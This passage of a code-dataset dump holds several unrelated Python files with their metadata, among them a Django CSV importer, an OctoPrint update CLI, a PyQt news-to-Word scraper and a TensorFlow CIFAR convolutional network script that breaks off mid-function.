object__detection_dot_protos_dot_bipartite__matcher__pb2._BIPARTITEMATCHER\n_MATCHER.oneofs_by_name['matcher_oneof'].fields.append(_MATCHER.fields_by_name['argmax_matcher'])\n_MATCHER.fields_by_name['argmax_matcher'].containing_oneof = _MATCHER.oneofs_by_name['matcher_oneof']\n_MATCHER.oneofs_by_name['matcher_oneof'].fields.append(_MATCHER.fields_by_name['bipartite_matcher'])\n_MATCHER.fields_by_name['bipartite_matcher'].containing_oneof = _MATCHER.oneofs_by_name['matcher_oneof']\nDESCRIPTOR.message_types_by_name['Matcher'] = _MATCHER\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\nMatcher = _reflection.GeneratedProtocolMessageType('Matcher', (_message.Message,), {'DESCRIPTOR':_MATCHER, \n '__module__':'object_detection.protos.matcher_pb2'})\n_sym_db.RegisterMessage(Matcher)","sub_path":"pycfiles/todl-0.1.1.tar/matcher_pb2.cpython-37.py","file_name":"matcher_pb2.cpython-37.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223482006","text":"from datetime import datetime, timedelta\nfrom os.path import exists, basename\nimport csv\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom consumption.models import User, UserConsumption\n\nDELIMITER = ','\nDATA_PATH = '{}/consumption/{}.csv'\nDATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nCONSUMPTION_INTERVAL = 30 # minutes\n\n\nclass Command(BaseCommand):\n help = 'import users and user consumption data'\n\n def add_arguments(self, parser):\n \"\"\"adds needed command arguments\"\"\"\n parser.add_argument(\n '-d',\n '--delimiter',\n default=DELIMITER,\n type=str,\n help='delimiting character',\n )\n parser.add_argument(\n '-i',\n '--interval',\n default=CONSUMPTION_INTERVAL,\n type=int,\n help='interval',\n )\n parser.add_argument(\n '-f',\n '--format',\n default=DATETIME_FORMAT,\n type=str,\n help='datetime format',\n )\n parser.add_argument(\n '-s',\n '--silent',\n default=False,\n action='store_true',\n help='do not display messages',\n )\n parser.add_argument('filepath', type=str)\n\n def handle(self, *args, **options):\n \"\"\"command logic: loads data into database\"\"\"\n\n self.file_path = file_path = options['filepath']\n self.delimiter = options['delimiter']\n self.interval = options['interval']\n self.format = options['format']\n self.silent = options['silent']\n\n if not exists(file_path):\n raise Exception('file \"{}\" not found'.format(file_path))\n # get consumption directory path\n self.base_path = file_path[:-(len(basename(file_path)))]\n self.add_users()\n\n def add_users(self):\n \"\"\"add users and their respective consumption data from CSV files\"\"\"\n\n with open(self.file_path, 'r') as users_file:\n reader = csv.reader(users_file, delimiter=self.delimiter)\n # skip the header row\n count = 0\n next(reader)\n with transaction.atomic():\n for row in reader:\n pk, area, tariff = row\n user_id = int(pk)\n # create the user if not exists\n _, created = User.objects.get_or_create(\n id=user_id,\n defaults=dict(area_code=area, tariff_code=tariff),\n )\n # increment user count for created users\n if created:\n count += 1\n # add user consumption data if file exists\n user_file_path = DATA_PATH.format(self.base_path, pk)\n if not exists(user_file_path):\n continue\n self.add_user_consumption(user_id, user_file_path)\n if not self.silent:\n self.stdout.write(\n f'Added {count} users and thier respective consumption data')\n\n def add_user_consumption(self, user_id, user_file_path):\n \"\"\"bulk insert user consumption data from CSV file\"\"\"\n\n with open(user_file_path, 'r') as consumption_file:\n sub_reader = csv.reader(consumption_file, delimiter=self.delimiter)\n # skip the header row\n next(sub_reader)\n instances = []\n for row2 in sub_reader:\n end = datetime.strptime(row2[0], DATETIME_FORMAT)\n start = end - timedelta(minutes=self.interval)\n consumption = float(row2[1])\n instances.append(\n UserConsumption(\n user_id=user_id,\n start=start,\n end=end,\n consumption=consumption,\n ))\n UserConsumption.objects.bulk_create(instances)\n","sub_path":"dashboard/consumption/management/commands/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"278140390","text":"from lib.PIL import Image\r\nimport random\r\nimport Locator\r\nfrom lib.noise.noise import pnoise2 as perlin\r\npixelColour = [[0,0,0],[255,0,0],[0,255,0],[0,0,255]]\r\nsize = 2048\r\noctaves = 6\r\npersistence = 0.05\r\nlacunarity = 2.0\r\ndef drawImage():\r\n testImage = Image.new(\"RGB\", (2048,2048), (255,255,255))\r\n pixel = testImage.load()\r\n for x in range(2048):\r\n for y in range(2048):\r\n freq = 64*octaves\r\n gen= perlin(x / freq, y / freq, octaves,persistence,lacunarity,size,size,0)\r\n if gen <-0.4:\r\n RGB = pixelColour[3]\r\n elif gen >0.4:\r\n RGB = pixelColour[2]\r\n elif -0.005< gen <0.00005:\r\n RGB = pixelColour[1]\r\n else:\r\n RGB = pixelColour[0]\r\n pixel[x,y]=(RGB[0],RGB[1],RGB[2])\r\n return testImage\r\ndef main():\r\n finalImage = drawImage()\r\n finalImage.save(Locator.main(\"res\\\\textures\\\\world\\\\worldMap.png\"))\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Evolution/src/python/Mapper.py","file_name":"Mapper.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298533957","text":"#!/usr/bin/python2.7 -tt\n\nimport sys, argparse, h5py\nimport numpy as np, pandas as pd\nfrom chip_db import chip_data\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('cell_type', help='name of cell type')\n\tparser.add_argument('interaction', help='name of interaction file')\n\tparser.add_argument('database', help='name of database file')\n\tparser.add_argument('--out_dir', help='directory to which to write files', default='.')\n\targs = parser.parse_args()\n\t#\n\tinteractions = pd.read_table(args.interaction, usecols=range(6), \n\t\tnames=['chrA', 'startA','endA','chrB','startB','endB'])\n\n\tif not 'chr' in interactions[['chrA']]:\n\t\tinteractions[['chrA']] = 'chr' + interactions[['chrA']]\n\t\tinteractions[['chrB']] = 'chr' + interactions[['chrB']]\n\tnum_interactions = len(interactions)\n\t# find longest interaction interval in df\n\tinteraction_length = 25000\n\tinput_length = interaction_length / 100\n\t#\n\thdfile = h5py.File(args.database, 'r')\n\tgrp = hdfile['/'+args.cell_type+'/50']\n\tdset = grp[u'chip_tracks']\n\t# Set up instance of database object\n\tcurr_db = chip_data(hdfile, grp, dset, args.cell_type, 'all')\n\t# Set length of input and number of training samples\n\t#\n\t# Pull out all relevant regions from the database and save for reuse\n\tdata_array_ll = []\n\tdata_array_lr = []\n\tdata_array_rl = []\n\tdata_array_rr = []\n\tfor idx, row in interactions.iterrows():\n\t\tif row[2] - row[1] == 5000:\n\t\t\tdata_array_ll.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1] - 20000, \n\t\t\t\t\tend_pos=row[2], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4] - 20000, \n\t\t\t\t\tend_pos=row[5], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_lr.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1] - 20000, \n\t\t\t\t\tend_pos=row[2], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4], \n\t\t\t\t\tend_pos=row[5] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_rl.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1], \n\t\t\t\t\tend_pos=row[2] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4] - 20000, \n\t\t\t\t\tend_pos=row[5], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_rr.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1], \n\t\t\t\t\tend_pos=row[2] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4], \n\t\t\t\t\tend_pos=row[5] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t# Print progress\n\t\tsys.stdout.write(\"\\r{:5.1f}\".format(float(idx) / num_interactions * 100) + \"% complete\")\n\tsys.stdout.write('\\r100.0% complete!\\n')\n\t#\n\tfor name, data_array in zip(['ll', 'lr', 'rl', 'rr'], [data_array_ll, data_array_lr, data_array_rl, data_array_rr]):\n\t\twith open(args.cell_type+':all:log_z:'+str(100)+'bp:'+name+'.npy', 'wb') as outfile:\n\t\t\tnp.save(outfile, np.array(data_array))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"extend_unevenly.py","file_name":"extend_unevenly.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546624883","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Devel\\OctoPrint\\OctoPrint\\src\\octoprint\\plugins\\softwareupdate\\cli.py\n# Compiled at: 2020-02-26 04:08:42\n# Size of source mod 2**32: 7534 bytes\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'\n__copyright__ = 'Copyright (C) 2015 The OctoPrint Project - Released under terms of the AGPLv3 License'\n\ndef commands(cli_group, pass_octoprint_ctx, *args, **kwargs):\n import click\n click.disable_unicode_literals_warning = True\n import sys, requests.exceptions\n from octoprint.cli.client import create_client, client_options\n\n @click.command('check')\n @click.option('--force', is_flag=True, help='Ignore the cache for the update check')\n @click.option('--only-new', is_flag=True, help='Only show entries with updates available')\n @client_options\n @click.argument('targets', nargs=(-1))\n def check_command(force, only_new, apikey, host, port, httpuser, httppass, https, prefix, targets):\n params = dict(force=force)\n if targets:\n params['check'] = ','.join(targets)\n else:\n client = create_client(settings=(cli_group.settings), apikey=apikey,\n host=host,\n port=port,\n httpuser=httpuser,\n httppass=httppass,\n https=https,\n prefix=prefix)\n r = client.get('plugin/softwareupdate/check', params=params)\n try:\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n try:\n click.echo('Could not get update information from server, got {}'.format(e))\n sys.exit(1)\n finally:\n e = None\n del e\n\n data = r.json()\n status = data['status']\n information = data['information']\n lines = []\n octoprint_line = None\n for key, info in information.items():\n status_text = 'Up to date'\n if info['updateAvailable']:\n if info['updatePossible']:\n status_text = 'Update available'\n else:\n status_text = 'Update available (manual)'\n elif only_new:\n continue\n line = '{} (target: {})\\n\\tInstalled: {}\\n\\tAvailable: {}\\n\\t=> {}'.format(info['displayName'], key, info['information']['local']['name'], info['information']['remote']['name'], status_text)\n if key == 'octoprint':\n octoprint_line = line\n else:\n lines.append(line)\n\n lines.sort()\n if octoprint_line:\n lines = [\n octoprint_line] + lines\n for line in lines:\n click.echo(line)\n\n click.echo()\n if status == 'current':\n click.echo('Everything is up to date')\n else:\n click.echo('There are updates available!')\n\n @click.command('update')\n @click.option('--force', is_flag=True, help='Update even if already up to date')\n @client_options\n @click.argument('targets', nargs=(-1))\n def update_command(force, apikey, host, port, httpuser, httppass, https, prefix, targets):\n data = dict(force=force)\n if targets:\n data['check'] = targets\n else:\n client = create_client(settings=(cli_group.settings), apikey=apikey,\n host=host,\n port=port,\n httpuser=httpuser,\n httppass=httppass,\n https=https,\n prefix=prefix)\n flags = dict(waiting_for_restart=False,\n seen_close=False)\n\n def on_message(ws, msg_type, msg):\n if not msg_type != 'plugin':\n if msg['plugin'] != 'softwareupdate':\n return\n plugin_message = msg['data']\n if 'type' not in plugin_message:\n return\n plugin_message_type = plugin_message['type']\n plugin_message_data = plugin_message['data']\n if plugin_message_type == 'updating':\n click.echo('Updating {} to {}...'.format(plugin_message_data.get('name', 'unknown'), plugin_message_data.get('version', 'n/a')))\n elif plugin_message_type == 'update_failed':\n click.echo('\\t... failed :(')\n else:\n if plugin_message_type == 'loglines' and 'loglines' in plugin_message_data:\n for entry in plugin_message_data['loglines']:\n prefix = '>>> ' if entry['stream'] == 'call' else ''\n error = entry['stream'] == 'stderr'\n click.echo(('\\t{}{}'.format(prefix, entry['line'].replace('\\n', '\\n\\t'))), err=error)\n\n else:\n if plugin_message_type == 'success' or plugin_message_type == 'restart_manually':\n results = plugin_message_data['results'] if 'results' in plugin_message_data else dict()\n if results:\n click.echo('The update finished successfully.')\n if plugin_message_type == 'restart_manually':\n click.echo('Please restart the OctoPrint server.')\n else:\n click.echo('No update necessary')\n ws.close()\n else:\n if plugin_message_type == 'restarting':\n flags['waiting_for_restart'] = True\n click.echo('Restarting to apply changes...')\n else:\n if plugin_message_type == 'failure':\n click.echo('Error')\n ws.close()\n\n def on_open(ws):\n if flags['waiting_for_restart'] and flags['seen_close']:\n click.echo(' Reconnected!')\n else:\n click.echo('Connected to server...')\n\n def on_close(ws):\n if flags['waiting_for_restart'] and flags['seen_close']:\n click.echo('.', nl=False)\n else:\n flags['seen_close'] = True\n click.echo('Disconnected from server...')\n\n socket = client.create_socket(on_message=on_message, on_open=on_open,\n on_close=on_close)\n r = client.post_json('plugin/softwareupdate/update', data=data)\n try:\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n try:\n click.echo('Could not get update information from server, got {}'.format(e))\n sys.exit(1)\n finally:\n e = None\n del e\n\n data = r.json()\n to_be_updated = data['order']\n checks = data['checks']\n click.echo('Update in progress, updating:')\n for name in to_be_updated:\n click.echo('\\t{}'.format(name if name not in checks else checks[name]))\n\n socket.wait()\n if flags['waiting_for_restart']:\n if socket.reconnect(timeout=60):\n click.echo('The update finished successfully.')\n else:\n click.echo(\"The update finished successfully but the server apparently didn't restart as expected.\")\n click.echo('Please restart the OctoPrint server.')\n\n return [\n check_command, update_command]","sub_path":"pycfiles/OctoPrint-1.4.0-py2.py3-none-any/cli.cpython-37.py","file_name":"cli.cpython-37.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36550943","text":"from context import sample\nfrom sample import longestWord\nimport unittest\n\n\nclass KnwonValues(unittest.TestCase):\n casos = ((\"Hoje Estarei Livre\", 7),\n (\"Ontem Sim\", 5))\n\n def test_answer(self):\n '''longestWord should return the kwon values with known inputs '''\n for frase, tam in self.casos:\n resultado = longestWord.longestWord(frase)\n self.assertEqual(resultado, tam)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pythonCodes/testes/test_longestWord.py","file_name":"test_longestWord.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641844733","text":"import requests\nimport re\nfrom lxml import etree\nimport time\nimport datetime\nimport sys\nimport docx\nfrom docx.oxml.ns import qn\nfrom docx.shared import Cm, Pt\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import QIcon, QFont\nfrom PyQt5.QtCore import QThread, pyqtSignal\nimport os\n\nfrom main_windows import Ui_MainWindow\nfrom statement import Statement\n\n\nclass DownWord(QThread):\n str_out = pyqtSignal(str) # 打印窗口信号\n status_out = pyqtSignal(str) # 修改状态文字信号\n clear_out = pyqtSignal() # 清屏\n over_out = pyqtSignal() # 完成\n\n def __init__(self, bace_url,start_page):\n super().__init__()\n self.bace_url = bace_url\n self.start_page = start_page\n self.type_flag = False # True 是城市资讯(使用&P=2) 其他使用 Index_2.html\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n self.stop_flag = False\n self.all_num = 0\n\n def get_url(self):\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n if 'ColId' in self.bace_url:\n self.type_flag = True\n else:\n self.type_flag = False\n page = self.start_page\n while True:\n if page % 5 == 0:\n self.clear_out.emit()\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n if self.type_flag == False:\n if page == 1:\n now_url = self.bace_url\n else:\n now_url = self.bace_url.replace('.html', '_{}.html')\n else:\n now_url = self.bace_url + '&P={}'\n next_url = now_url.format(str(page))\n print(next_url)\n selector = ''\n for i in range(5):\n try:\n mes = requests.get(next_url, timeout=5, headers=self.headers).content.decode('utf-8')\n selector = etree.HTML(mes)\n break\n except Exception as e:\n print(e)\n if i == 4:\n err_mes = '访问基础页面出错:' + str(e)\n self.write_err_txt(err_mes)\n self.ui.textEdit.append(\"出错,已记录\")\n print('失败')\n return\n time.sleep(1)\n all_url = selector.xpath('//*[@id=\"contentList\"]/li[@class=\"common\"]/span/a')\n if all_url:\n print('第{}页'.format(str(page)))\n self.str_out.emit('抓取第{}页中。。。'.format(str(page)))\n for j, one_url in enumerate(all_url):\n self.all_num += 1\n print(self.all_num)\n if (j + 1) % 10 == 0:\n self.str_out.emit('完成{}篇'.format(str(j + 1)))\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n try:\n url = 'http://www.chinacity.org.cn' + one_url.xpath('./@href')[0]\n except:\n continue\n title = one_url.xpath('./text()')\n title = title[0] if title else ''\n over_title = re.sub(r'[\\\\/?*\"<>:|]', '', title)\n self.download_word(over_title, url)\n self.str_out.emit('完成')\n page += 1\n else:\n self.str_out.emit('全部完成!'.format(str(page)))\n self.over_out.emit()\n break\n\n def download_word(self, title, one_url):\n # print(one_url)\n body_selector = ''\n for i in range(5):\n try:\n res = requests.get(one_url, timeout=5, headers=self.headers)\n status = str(res.status_code)\n if status == '404':\n mes = '链接:'+ one_url + '失效'\n self.write_err_txt(mes)\n return\n mes = res.content.decode('utf-8')\n body_selector = etree.HTML(mes)\n print('成功')\n break\n except Exception as e:\n print('访问文章链接出错', e)\n if i == 4:\n err_mes = '访问文章链接出错:'+str(e)\n self.write_err_txt(err_mes)\n self.ui.textEdit.append(\"出错,已记录\")\n print('失败')\n return\n time.sleep(1)\n time.sleep(0.2)\n body_text = body_selector.xpath('//div[@class=\"artleft\"]/div[2]/p/text()')\n body_list = []\n if self.stop_flag:\n return\n for one_d in body_text:\n paragraph = one_d.strip()\n body_list.append(paragraph)\n if self.stop_flag:\n return\n self.save_word(body_list, title)\n\n def write_err_txt(self, mes):\n \"\"\"写错误日志\"\"\"\n now_err_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n with open('./system_files/错误日志.txt', 'a', encoding='utf-8') as file:\n file.write(now_err_time + ' ------- ')\n file.write(str(mes) + '\\n')\n\n def save_word(self, text_list, name):\n '''\n 写成word文档\n :param text_list: 包含正文的列表,一段一个元素\n :param name: 保存的名字\n :return:\n '''\n # doc = docx.Document()\n doc = docx.Document(docx=os.path.join(os.getcwd(), './system_files/default.docx'))\n # 新增样式(第一个参数是样式名称,第二个参数是样式类型:1代表段落;2代表字符;3代表表格)\n # 写标题\n paragraph = doc.add_paragraph()\n r = paragraph.add_run(name)\n r.font.size = Pt(22)\n r.font.name = '黑体'\n r._element.rPr.rFonts.set(qn('w:eastAsia'), '黑体')\n paragraph.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n # 设置一个空白正文样式\n style = doc.styles['Normal']\n # 设置西文字体\n style.font.name = 'Times New Roman'\n # #设置字体大小\n style.font.size = Pt(16)\n # 设置中文字体\n style.element.rPr.rFonts.set(qn('w:eastAsia'), '仿宋_GB2312')\n # 获取段落样式\n paragraph_format = style.paragraph_format\n # 段落首行缩进\n paragraph_format.first_line_indent = Cm(1.12)\n # 段落行距15磅\n paragraph_format.line_spacing = 1.50\n for one in text_list:\n doc.add_paragraph(str(one), style='Normal') # 插入一个段落,文本为“第一段”\n doc.save('./word文档/{}.docx'.format(name))\n\n def change_stop_flag(self):\n self.status_out.emit('stoping')\n self.stop_flag = True\n\n def run(self):\n try:\n self.get_url()\n except Exception as e:\n mes = '启动错误:' + str(e)\n self.write_err_txt(mes)\n print(e)\n\n\nclass VisitMain(object):\n \"\"\"界面\"\"\"\n\n def __init__(self):\n self.app = QtWidgets.QApplication(sys.argv)\n self.main_window = QtWidgets.QWidget()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.main_window)\n self.main_window.setWindowIcon(QIcon('./system_files/图标.png'))\n self.main_window.setFont(QFont(\"Microsoft YaHei\", 9))\n self.set_bace_url()\n self.connect()\n self.ui.pushButton.setEnabled(False)\n # 创建声明\n self.statement = Statement('news_output_word')\n if not self.statement.check_pd:\n exit()\n if self.statement.accept:\n self.main_window.show()\n else:\n self.statement.ui.pushButton.clicked.connect(self.main_window.show)\n sys.exit(self.app.exec_())\n\n def connect(self):\n self.ui.pushButton.clicked.connect(self.stop_flag) # 停止\n self.ui.pushButton_2.clicked.connect(self.start_spider) # 开始\n\n def start_spider(self):\n \"\"\"启动爬虫\"\"\"\n self.clear()\n word_url = self.ui.lineEdit.text()\n if word_url:\n pass\n else:\n self.ui.textEdit.append(\"请导入链接!\")\n return\n\n start_page = self.ui.lineEdit_2.text()\n if start_page:\n try:\n a = int(start_page)\n except:\n self.ui.textEdit.append(\"请填写正确的页数\")\n return\n pass\n else:\n self.ui.textEdit.append(\"请填写页数\")\n return\n\n try:\n if not os.path.exists('./system_files'):\n os.makedirs('./system_files')\n with open(\"./system_files/last_url.txt\", 'w') as txtData:\n txtData.write(self.ui.lineEdit.text())\n except Exception as e:\n print('保存url错误:', e)\n self.change_status('begin')\n self.spider1 = DownWord(word_url,int(start_page))\n self.spider1.start()\n self.spider1.str_out.connect(self.pri_text)\n self.spider1.status_out.connect(self.change_status)\n self.spider1.clear_out.connect(self.clear)\n self.spider1.over_out.connect(self.end_spider)\n\n def end_spider(self):\n self.ui.pushButton.setEnabled(False)\n self.ui.pushButton_2.setEnabled(True)\n\n def set_bace_url(self):\n self.ui.lineEdit_2.setText('1')\n try:\n with open(\"./system_files/last_url.txt\") as txtData:\n sender = txtData.readlines()[0]\n self.ui.lineEdit.setText(sender)\n except:\n self.ui.textEdit.append(\"无上次记录,请导入链接。\")\n pass\n\n def clear(self):\n self.ui.textEdit.clear()\n\n def pri_text(self, text):\n self.ui.textEdit.append(text)\n\n def change_status(self, mes):\n if mes == 'stop':\n self.ui.label_3.setText('已停止')\n self.ui.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.pushButton.setEnabled(False)\n self.ui.pushButton_2.setEnabled(True)\n elif mes == 'begin':\n self.ui.label_3.setText('运行中')\n self.ui.label_3.setStyleSheet(\"color: rgb(50, 150, 0)\")\n self.ui.pushButton_2.setEnabled(False)\n self.ui.pushButton.setEnabled(True)\n elif mes == 'stoping':\n self.ui.label_3.setText('停止中')\n self.ui.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.pushButton.setEnabled(False)\n else:\n pass\n\n # color: rgb(50, 150, 0); #开始\n\n def stop_flag(self):\n self.spider1.change_stop_flag()\n\n\nif __name__ == '__main__':\n VisitMain()\n # a = DownWord()\n # a.get_url()\n # url = 'http://www.chinacity.org.cn/csfz/cshj/391391.html'\n # a.download_word('1', url)\n","sub_path":"项目模块/网易云/网易云/downlword.py","file_name":"downlword.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"66063630","text":"\"\"\" Convolutional Neural Network.\n\nBuild and train a convolutional neural network with TensorFlow.\nThis example is using the MNIST database of handwritten digits\n(http://yann.lecun.com/exdb/mnist/)\n\nThis example is using TensorFlow layers API, see 'convolutional_network_raw'\nexample for a raw implementation with variables.\n\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport sys\nimport os\nfrom server.model import datasets\nimport tensorflow as tf\nimport pandas as pd\nfrom tensorflow.contrib import predictor\nfrom server import config\nimport json\n\n\n# Training Parameters\nlearning_rate = 0.001\nnum_steps = 2\nbatch_size = 128\n\n# Network Parameters\nnum_input = 32*32*3 # MNIST data input (img shape: 28*28)\nnum_classes = 10 # MNIST total classes (0-9 digits)\ndropout = 0.25 # Dropout, probability to drop a unit\n\n#set parameter\ndef set_parameter(dic):\n # dic = json.loads(conf)[0]\n global learning_rate, num_steps, batch_size\n learning_rate = dic['learning_rate'];\n num_steps = dic['num_steps']\n batch_size = dic['batch_size']\n\n# Create the neural network\ndef conv_net(x_dict, n_classes, dropout, reuse, is_training):\n # Define a scope for reusing the variables\n with tf.variable_scope('ConvNet', reuse=reuse):\n # TF Estimator input is a dict, in case of multiple inputs\n x = x_dict['images']\n\n # MNIST data input is a 1-D vector of 784 features (28*28 pixels)\n # Reshape to match picture format [Height x Width x Channel]\n # Tensor input become 4-D: [Batch Size, Height, Width, Channel]\n x = tf.reshape(x, shape=[-1, 32, 32, 3])\n\n # Convolution Layer with 32 filters and a kernel size of 5\n conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)\n # Max Pooling (down-sampling) with strides of 2 and kernel size of 2\n conv1 = tf.layers.max_pooling2d(conv1, 2, 2)\n\n # Convolution Layer with 64 filters and a kernel size of 3\n conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)\n # Max Pooling (down-sampling) with strides of 2 and kernel size of 2\n conv2 = tf.layers.max_pooling2d(conv2, 2, 2)\n\n # Flatten the data to a 1-D vector for the fully connected layer\n fc1 = tf.contrib.layers.flatten(conv2)\n\n # Fully connected layer (in tf contrib folder for now)\n fc1 = tf.layers.dense(fc1, 1024)\n # Apply Dropout (if is_training is False, dropout is not applied)\n fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n # Output layer, class prediction\n out = tf.layers.dense(fc1, n_classes)\n\n return out\n\n\n# Define the model function (following TF Estimator Template)\ndef model_fn(features, labels, mode):\n # Build the neural network\n # Because Dropout have different behavior at training and prediction time, we\n # need to create 2 distinct computation graphs that still share the same weights.\n logits_train = conv_net(features, num_classes, dropout, reuse=False,\n is_training=True)\n logits_test = conv_net(features, num_classes, dropout, reuse=True,\n is_training=False)\n\n # Predictions\n pred_classes = tf.argmax(logits_test, axis=1)\n pred_probas = tf.nn.softmax(logits_test)\n\n\n # If prediction mode, early return\n if mode == tf.estimator.ModeKeys.PREDICT:\n print('PREDICT mode')\n return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)\n\n # Define loss and optimizer\n loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op = optimizer.minimize(loss_op,\n global_step=tf.train.get_global_step())\n\n # Evaluate the accuracy of the model\n acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)\n\n # TF Estimators requires to return a EstimatorSpec, that specify\n # the different ops for training, evaluating, ...\n estim_specs = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=pred_classes,\n loss=loss_op,\n train_op=train_op,\n eval_metric_ops={'accuracy': acc_op})\n\n return estim_specs\n\ndef evaluate(model, x_test, y_test):\n # Evaluate the Model\n # Define the input function for evaluating\n input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': x_test}, y=y_test,\n batch_size=batch_size, shuffle=False)\n # Use the Estimator 'evaluate' method\n e = model.evaluate(input_fn)\n\n print(\"Evaluate Accuracy:\", e['accuracy'])\n\n return e['accuracy'], e['loss']\n\n# 使用predictor.from_saved_model()加载导出的模型,用来预测!\ndef predict(export_dir, x_test):\n print('Predict mode')\n predict_fn = predictor.from_saved_model(export_dir)\n predictions = predict_fn( {\"images\": x_test} )\n df = pd.DataFrame(predictions)\n # df['original_labels'] = y_test\n print(df.head())\n # total = len(predictions['output'])\n # count = 0\n # for i in range(total):\n # if predictions['output'][i] == y_test[i]:\n # count += 1\n\n # accuracy = count/total\n # print(\"Predict Accuracy:\", accuracy)\n return \"Predict Accuracy:\" + str(accuracy)\n\ndef train(data_files):\n (x_train, y_train), (x_test, y_test),labels = datasets.load_cifar10(data_files)\n x_train = x_train.astype(np.float32).reshape(x_train.shape[0], num_input)\n y_train = y_train.astype(np.float32)\n\n x_test = x_test.astype(np.float32).reshape(x_test.shape[0], num_input)\n y_test = y_test.astype(np.float32)\n\n print('Train mode')\n # tf.logging.set_verbosity(tf.logging.INFO)\n # Build the Estimator\n model = tf.estimator.Estimator(model_fn)\n\n # Define the input function for training\n input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': x_train}, y=y_train,\n batch_size=batch_size, num_epochs=None, shuffle=True)\n\n # Train the Model\n model.train(input_fn, steps=num_steps)\n acc, loss = evaluate(model, x_test, y_test)\n\n feat_spec = {\"images\": tf.placeholder(\"float\", name=\"images\", shape=[None, x_train.shape[1]])}\n # print(feat_spec)\n\n # Export model\n receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feat_spec)\n 